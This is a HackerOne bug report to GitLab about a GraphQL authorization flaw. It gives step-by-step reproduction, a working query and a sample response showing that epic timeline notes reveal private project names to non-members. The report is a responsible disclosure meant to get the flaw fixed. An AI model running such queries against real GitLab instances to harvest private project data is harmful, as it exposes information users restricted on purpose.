Private project names exposed in GraphiQL queries
HackerOne report #714386 by ashish_r_padelkar on 2019-10-15, assigned to @jeremymatos:
Summary
Hello,
I reported this #640962 but it was duplicate and i see that original has been marked as resolved. But there still few cases which discloses some info to unauthorised users
Steps to reproduce
- Create a Public group
- Create private project underneath
- Create a issue inside private project
- create 2 EPICs in public groups
- In issue, apply the EPIC1 to the issue . This should be done using issue i.e apply EPIC to issue and not the other way.
- Now change the EPIC from EPIC1 to EPIC 2 with in issue itself.
- Now if you check go to EPIC and see the timeline, you will see something like this
- If any non member see the EPIC, they wont see this info in UI as they are not the members.
9 But using below graphiQL query, they can see this info which reveals the private project name
Go to https://gitlab.com/-/graphql-explorer
query ($group_path: ID!) {
group(fullPath: $group_path) {
epic(iid:"1"){notes{edges{node{body}}}}
}
} Query Variables
{"group_path": "newgroup_1"} The response would be like
{
"data": {
"group": {
"epic": {
"notes": {
"edges": [
{
"node": {
"body": "moved issue privateproject_1#2 to epic &2"
}
}
]
}
}
}
}
}Examples
You can use my above example. I have set the group as public and you wont see any private projects i it because you are not a member. However, using graphql, you will notice above response which i posted which reveals the private project name to you
What is the current bug behavior?
Discloses private project name to unauthorised users
What is the expected correct behavior?
Authorised users should see the private project related info
Output of checks
This bug happens on GitLab.com and might be on omnibus installations too.
Regards,
Ashish
Impact
Discloses private project names to unauthorised users using GraphQL
Attachments
Warning: Attachments received through HackerOne, please exercise caution!